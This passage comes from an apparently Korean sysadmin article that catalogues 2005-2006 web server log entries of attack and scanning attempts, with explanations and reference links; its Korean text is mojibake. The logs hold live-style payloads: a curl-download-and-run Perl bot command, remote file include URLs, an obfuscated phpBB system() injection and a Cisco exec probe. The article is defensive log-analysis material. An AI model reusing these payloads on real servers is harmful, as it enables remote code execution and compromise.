    203.190.xxx.xxx - - [01/Feb/2006:01:51:25 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    203.190.xxx.xxx - - [01/Feb/2006:01:52:32 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
     


    - IP : ¹æ±Û¶óµ¥½Ã(BD, 203.190.254.0 - 203.190.255.255)

    10. ikonBooard Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    211.217.xx.xx - - [22/Feb/2006:08:06:25 +0900] "GET /cgi-bin/ikonboard/ikonboard.cgi?dir=http://www.members.lycos.co.uk/botperl/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20www.members.lycos.co.uk/botperl/botperl;perl%20botperl HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


    - IP : ±¹³»(³Ø½ºÆ®ÀÎÆ÷¸ÞÀ̼Ç, 211.217.75.26-211.217.75.26)

    11. WebCalendarÀÇ send_reminders.php Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    65.203.xxx.xxx - - [05/Dec/2005:02:34:23 +0900] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:27 +0900] "GET /cacti/include/config_settings.php?config[include_path]=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /calendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /webcalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:31 +0900] "GET /WebCalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:32 +0900] "GET /calendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0

    216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /WebCalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /cal/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /Calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:29 +0900] "GET /calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


    - IP : UUNET(65.203.134.96 - 65.203.134.111)
           ¹Ì±¹(US, 216.180.224.0 - 216.180.255.255)
    - WebCalendar 1.0.1 º¸´Ù ³·Àº ¹öÀüÀº send_reminders.php¿¡ ¿ø°ÝÁöÀÇ ÆÄÀÏÀ» includeÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.

    Âü°í ÀÚ·á :
    * WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
      http://www.securityfocus.com/bid/14651

    12. RRDtool ±â¹ÝÀÇ Æ®·¡ÇÈ ºÐ¼®Åø CactiÀÇ graph_image.php Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    66.14.xxx.xx - - [01/Dec/2005:01:03:22 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
    216.127.xx.xxx - - [23/Dec/2005:19:57:31 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
    208.171.xxx.xxx - - [24/Dec/2005:02:13:41 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
     


    - IP : ¹Ì±¹(US, 216.127.64.0 - 216.127.95.255)
           ¹Ì±¹(US, 208.169.96.0 - 208.173.191.255)

    Âü°í ÀÚ·á :
    * RaXnet Cacti Graph_Image.PHP Remote Command Execution Vulnerability
      http://www.securityfocus.com/bid/14042/

    13. ATD OpenSSL Ãë¾àÁ¡ ½ºÄ³´× Åø¿¡ ÀÇÇÑ ·Î±×

     
    11.53.xxx.x - - [01/Dec/2005:00:49:31 +0900] "GET /sumthin HTTP/1.0" 404 0
     


    - IP : ¹Ì±¹(US, 11.0.0.0 - 11.255.255.255)

    Âü°í ÀÚ·á :
    * Analysis of the ATD OpenSSL Mass Exploiter
      http://www.lurhq.com/atd.html
    * ATD OpenSSL Mass Exploiter Analysis (another "/sumthin" scan tool)
      http://seclists.org/lists/incidents/2003/Apr/0059.html

    * /sumthin Solved
      http://www.webmasterworld.com/forum11/2100.htm
      http://www.webmasterworld.com/forum39/782.htm

    14. Cisco SwitchÀÇ ¾ÆÁÖ ¿¹Àü HTTP Ãë¾àÁ¡(2001³â)À» ÀÌ¿ëÇÑ °ø°Ý

     
    211.115.xxx.xx - - [27/Feb/2006:13:39:22 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
    211.115.xxx.xx - - [27/Feb/2006:14:07:16 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
    211.115.xxx.xx - - [27/Feb/2006:14:22:24 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
    211.115.xxx.xx - - [27/Feb/2006:14:42:59 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
    211.115.xxx.xx - - [27/Feb/2006:15:32:15 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
     


    - IP : ±¹³»(CATV »ç¿ëÀÚ, 211.115.224.0-211.115.255.255)
    - cisco scanner ¶ó´Â ÀÚµ¿È­µÈ ½ºÄ³´× ÅøÀÌ ÀÖ´Ù.

    Âü°í ÀÚ·á :
    * Cisco Security Advisory: IOS HTTP Authorization Vulnerability
      http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
    * Old Cisco exploit tries to make a return:
      http://isc.sans.org/diary.php?storyid=1104
    * Multi-thread Cisco HTTP vulnerable scanner
      http://wayreth.eu.org/cisco_scanner.c

    15. ÇÁ¶ô½Ã ¼­¹ö·Î È°¿ëÇϱâ À§ÇÑ ¿äû

     
    220.137.xx.xxx - - [12/Dec/2005:05:07:19 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231
    220.137.xx.xxx - - [12/Dec/2005:05:11:49 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231

    61.228.xxx.xxx - - [30/Jan/2006:10:42:28 +0900] "CONNECT msa-mx8.hinet.net:25 HTTP/1.0" 405 231 "-"
     


    - IP : ´ë¸¸ (TW, 220.137.0.0/16)
           ´ë¸¸ (TW, 61.228.0.0/14)
    - HTTPÀÇ COONECT method¸¦ ÅëÇØ ÇÁ¶ô½Ã ¿äûÀ» ÇÑ °ÍÀÌ´Ù. CONNECT msa-mx6.hinet.net:25 ¿äûÀº
      ÀÌ À¥¼­¹ö¸¦ °æÀ¯ÇÏ¿© msa-mx8.hinet.net ¼­¹öÀÇ 25¹ø Æ÷Æ®(SMTP)·Î Á¢¼ÓÇÑ ÈÄ ½ºÆÔ ¸ÞÀÏÀ» ¹ß¼ÛÇÏ·Á´Â
      °ÍÀÌ´Ù. msa-mx8.hinet.net ¸ÞÀÏ ¼­¹ö ÀÔÀå¿¡¼­´Â ½ºÆÔ ¹ß¼ÛÁö IP°¡ À¥¼­¹ö°¡ µÇ¹Ç·Î, ½ºÆÔ ¹ß¼ÛÀÚÀÇ
      À§Ä¡°¡ ¼û°ÜÁö´Â ¹®Á¦°¡ ÀÖ´Ù.
    - À§¿¡¼­ »óÅÂÄÚµå 405´Â CONNECT method »ç¿ëÀ» Çã¿ëÇÏÁö ¾Ê¾ÒÀ½À» ÀǹÌÇϸç, 200 ÄÚµå¶ó¸é À¥¼­¹öÀÇ
      80Æ÷Æ®·Î Á¢¼Ó ÈÄ °á°ú¸¦ È®ÀÎÇغÁ¾ß ÇÑ´Ù. °á°ú°¡ À¥ÆäÀÌÁö ³»¿ëÀÌ ¾Æ´Ï¸é Çã¿ëµÈ °ÍÀÏ ¼ö ÀÖÀ¸´Ï
      À¥¼­¹ö ¼³Á¤¿¡¼­ CONNECT method »ç¿ëÀ» Á¦ÇÑÇϱ⠹ٶõ´Ù.

      
     
      $ telnet 123.123.123.123 80
      Trying 123.123.123.123...
      Connected to ????.???.??? (123.123.123.123).
      Escape character is '^]'.
      CONNECT xxx.xxx.xxx.xxx:25 HTTP/1.0

      .. °á°ú »ý·« ...
      
     


    Âü°íÀÚ·á :

    * Proxy ¼­¹ö¸¦ °æÀ¯ÇÑ ½ºÆÔ¸ÞÀÏ ¹ß¼Û
      http://linux4you.co.kr/bbs/view.php?id=lbd05&no=76
    * Re: Strange apache logs: CONNECT
      http://seclists.org/lists/incidents/2002/Nov/0131.html
    * HTTP/1.1 Method Definitions
      http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

    16. MicrosoftÀÇ FrontPage Server ExtensionsÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    85.224.xxx.xx - - [01/Dec/2005:00:33:20 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
    85.224.xxx.xx - - [01/Dec/2005:00:35:04 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
    85.224.xxx.xx - - [01/Dec/2005:00:43:42 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
     


    - IP : ³×´ú¶õµå(NL, 85.0.0.0 - 85.255.255.255)

    Âü°íÀÚ·á :

    * CVE-2001-0341
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0341
    * Microsoft FrontPage Server Extensions Buffer Overflow (fp30reg.dll)
      http://www.securiteam.com/exploits/6A00J1P8UQ.html

    17. phpBBÀÇ viewtopic.php Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    130.63.xxx.xxx - - [23/Feb/2006:23:26:52 +0900] "GET /bbs/viewtopic.php?t=1112&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
    60.248.xxx.xxx - - [23/Feb/2006:23:43:43 +0900] "GET /bbs/viewtopic.php?p=2113&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
     


    - IP : ij³ª´Ù(CA, 130.63.0.0 - 130.63.255.255)
           ´ë¸¸(TW, 60.248.0.0 - 60.248.255.255)
    - phpBBÀÇ 2.0.11 ÀÌÀü ¹öÀüÀº viewtopic.phpÀÇ highlight= ·Î ³Ñ¾î¿À´Â °ªÀ» urldecode() ÇÔ¼ö¸¦ »ç¿ëÇؼ­
      Ã³¸®ÇÏ¿© º¸¾È»óÀÇ ¹®Á¦°¡ ÀÖ´Ù. ÀÌ Ãë¾àÁ¡À¸·Î ÀÎÇØ ¿ÜºÎ °ø°ÝÀÚ´Â ¿øÇÏ´Â ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù.
      À̸¦ ÀÚµ¿È­ÇÑ ¿úÀÎ Santy ¿úÀÌ 2004³â ¸»ºÎÅÍ ±Þ¼ÓÈ÷ ÆÛÁ³À¸¸ç, ¾ÆÁ÷µµ ÀÌ·¯ÇÑ °ø°ÝÀº °è¼ÓµÇ°í ÀÖ´Ù.

    Âü°íÀÚ·á :

    * ¾ÆÆÄÄ¡¿¡¼­ phpBB¿ú Â÷´Ü ¹× º°µµ ·Î±× ÀúÀå (±Û ÁÁÀºÁøÈ£, 2005.2)
      http://coffeenix.net/board_print.php?bd_code=742

    * Database passwords is open. Passthru() is available. [Highlight Vulnerability]
      http://www.phpbb.com/security/final_reports.php?p=1

    18. phpMyAdminÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /PMA/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /mysql/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /admin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /db/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /dbadmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /admin/pma/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/mysql/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /phpmyadmin2/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysqladmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:04 +0900] "GET /myadmin/main.php HTTP/1.0" 404 0 "PMAFind"
     


    - IP : ¿µ±¹ (GB=UK, 81.5.128.0 - 81.5.191.255)
    - PMAFind´Â PHPMyAdmin-WebinterfacesÀÇ Ãë¾àÁ¡À» ã±âÀ§ÇØ µ¶ÀÏÀο¡ ÀÇÇØ ¸¸µé¾îÁø À©µµ¿ì¿ë ÅøÀÌ´Ù.
      IP´ë¿ªÀ» ÁöÁ¤ÇÒ ¼öµµ ÀÖ°í, IP¸ñ·ÏÀ» ÆÄÀÏ·Î ÀúÀåÇÏ¿© ´ë·®À¸·Î ½ºÄ³´×ÇÒ ¼ö ÀÖ´Â ¼öµµ ÀÖ´Ù.
      
    Âü°íÀÚ·á :

    * Pmafind.exe, PHPMyAdmin-Scanner
      http://www.governmentsecurity.org/forum/index.php?showtopic=17244
    * Multiple XSS Vulnerabilities in phpMyAdmin 2.6.0-pl2 and prior (2004.11)
      http://www.netvigilance.com/html/advisory0005.htm
    * phpMyAdmin Multiple Remote Vulnerabilities (2004.12)
      http://www.securityfocus.com/bid/11886
    * phpMyAdmin Remote Command Execution Vulnerability (2004.10)
      http://www.securityfocus.com/bid/11391
      
    19. ±¹³» Ç÷£Æ¼³Ý À¥·Îº¿¿¡ ÀÇÇØ ³²Àº ·Î±×

     
    218.232.120.xx - - [20/Jan/2006:12:16:11 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
    218.232.120.xx - - [26/Jan/2006:20:48:54 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
     


    - IP : ±¹³»(Ç÷£Æ¼³Ý, 218.232.120.0-218.232.120.127)
    - À¯ÇØ»çÀÌÆ®Â÷´Ü¼­ºñ½º¸¦ Á¦°øÇÏ´Â Ç÷£Æ¼³Ý À¥·Îº¿ÀÌ robots.txtÀÌ ¾Æ´Ñ robotsxx.txt¸¦ ã´ÂÁö???
      Ç÷£Æ¼³Ý ¾÷ü¿¡ ÀÌ »çÇ׿¡ ´ëÇØ ´äº¯À» ¿äûÇßÀ¸³ª ¾ÆÁ÷ ´äÀÌ ¾ø´Ù.

    Âü°íÀÚ·á :

    * robotsxx.txt¸¦ ã´Â ÀÌ»óÇÑ spider
      http://j2k.naver.com/j2k_frame.php/korean/www.tkamiya.net/sd5/archives/000601.html
      http://www.tkamiya.net/sd5/archives/000601.html

    20. Ãë¾àÁ¡ ½ºÄ³´×ÅøÀÎ Nessus ·Î Ãë¾àÁ¡À» ãÀ» ¶§

     
    61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 12931 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:10 +0900] "GET /fpFWUpload.html HTTP/1.1" 404 532
    "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:11 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /NessusTest17153.html HTTP/1.1" 404 532 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /foo.jsp?param=<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 406 535 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "TRACE /Nessus8348.html HTTP/1.1" 200 288 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    ... ÀÌÇÏ »ý·« ...
     


    - IP : Áß±¹(CN, 61.177.0.0 - 61.177.255.255)
    - º¸¾È Ãë¾àÁ¡ ½ºÄ³´×ÅøÀÎ Nessus·Î ½ºÄ³´× ¿äûÇßÀ» ¶§ ³²´Â ·Î±×ÀÌ´Ù.
      º»ÀÎÀÌ ¿äûÇÑ°Ô ¾Æ´Ï¶ó¸é °ø°Ý´ë»óÀ» ã±âÀ§ÇÑ ½ÃµµÀÌ´Ù.

    Âü°íÀÚ·á :

    * Vulnerability Scanner Nessus
      http://www.nessus.org/

    * Nessus ºÐ¼®º¸°í¼­
      http://www.certcc.or.kr/servlet/download?mode=secu_tools&file=linux_Nessus.pdf

    21. º¸¾È ½ºÄ³´×Åø DFind¿¡ ÀÇÇØ ³²Àº ·Î±×

     
    211.202.x.xxx - - [15/Mar/2006:09:54:44 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
    211.202.x.xxx - - [15/Mar/2006:09:55:12 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
     


    - ±¹³» (Çϳª·ÎÅÚ·¹ÄÞ ÇÒ´ç IP ´ë¿ª, 211.202.0.0-211.202.3.255)
    - À§ ·Î±×´Â Æ÷Æ®½ºÄ³´×ÅøÀÎ DFind °¡ ³²±ä signatureÀÌ´Ù.
      DFind´Â Æ÷Æ® ½ºÄ³´×, ping üũ, Ãë¾àÁ¡ ½ºÄ³´×, À¥¼­¹ö Á¾·ù Æľǰú ¿øÇÏ´Â HTML ÆÄÀÏÀÌ ÀÖ´ÂÁö ã¾ÆÁÖ´Â
      µîÀÇ ±â´ÉÀ» °¡Áø ÅøÀÌ´Ù.

    Âü°íÀÚ·á :

    * w00tw00t.at.ISC.SANS.DFind
      http://www.atlink.it/~conti/2006/03/04/w00tw00tatiscsansdfind-update/
    * w00tw00t
      http://isc.sans.org/diary.php?storyid=900
      http://isc.sans.org/diary.php?storyid=591
    * DFind
      http://class101.org
      Ä¿ÇǴнº Ä«Æä ÃÖ±Ù ±Û
    [03/24] Youtube òÁ&#2
    [03/20] Re: ¿Â¶óÀΰÔÀÓÀÇ Á¾ÁÖ±¹ ´ëÇѹα¹
    [03/20] ½ÇÁ¦&#4
    [03/18] ±¹°¡&#5
    [10/20] Cross Compiler ±ò
    [07/14] SSL ¬¡¬°
    [04/26] Re: µµ½ºÈ­¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
    [04/25] µµ½ºÈ­¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
    [10/30] Cshell¿¡¼­ ³­¼ö ¼³Á¤
    [10/23] °øÇ×öµµÁÖ½Äȸ»ç SE ±¸ÀÎ Ëì
    [01/26] Re: wgetÀ¸·Î ´Ù¸¥¼­¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
    [01/25] wgetÀ¸·Î ´Ù¸¥¼­¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
    [01/11] ƯÁ¤ ¾Èµå·ÎÀ̵å WebView ¹öÀü¿¡¼­ SSL ¹®Á¦ (WebView ¹ö±×)
    [08/01] DNS forwarder (Àü´ÞÀÚ) ¼­¹ö¸¦ ÅëÇؼ­ Äõ¸®ÇÏ¸é ¿ª¹æÇâÀ» ¹Þ¾Æ¿ÀÁú ¸øÇÕ´Ï´Ù.
    [05/16] (ÁÖ)ÈÄÀÌÁî ½Ã½ºÅÛ¿£Áö´Ï¾î (°æ·ÂÀÚ) ¸ðÁý
      New!   ÃÖ±Ù¿¡ µî·ÏÇÑ ÆäÀÌÁö
      KiCad EDA Suite project (Free/Libre/Open-Source EDA Suite) (CAD)
      ¿ÀÇÂij½ºÄÉÀ̵å ijµå (OpenCASCADE CAD)
      QCad for Windows --- GNU GPL (Free Software)
      The Hello World Collection
      IPMI¸¦ È°¿ëÇÑ ¸®´ª½º ¼­¹ö°ü¸®
      DNS ¼³Á¤ °Ë»ç
      nagiosgraph ¼³Ä¡ ¹æ¹ý
      Slony-I ¼³Ä¡ ¹æ¹ý (postgresql replication tool)
      Qmail±â¹ÝÀÇ Anti spam ½Ã½ºÅÛ ±¸ÃàÇϱâ
      clusterssh

    [ ÇÔ²²ÇÏ´Â »çÀÌÆ® ]




    ¿î¿µÁø : ÁÁÀºÁøÈ£(truefeel), ¾ß¼ö(yasu), ¹ü³ÃÀÌ, sCag
    2003³â 8¿ù 4ÀÏ~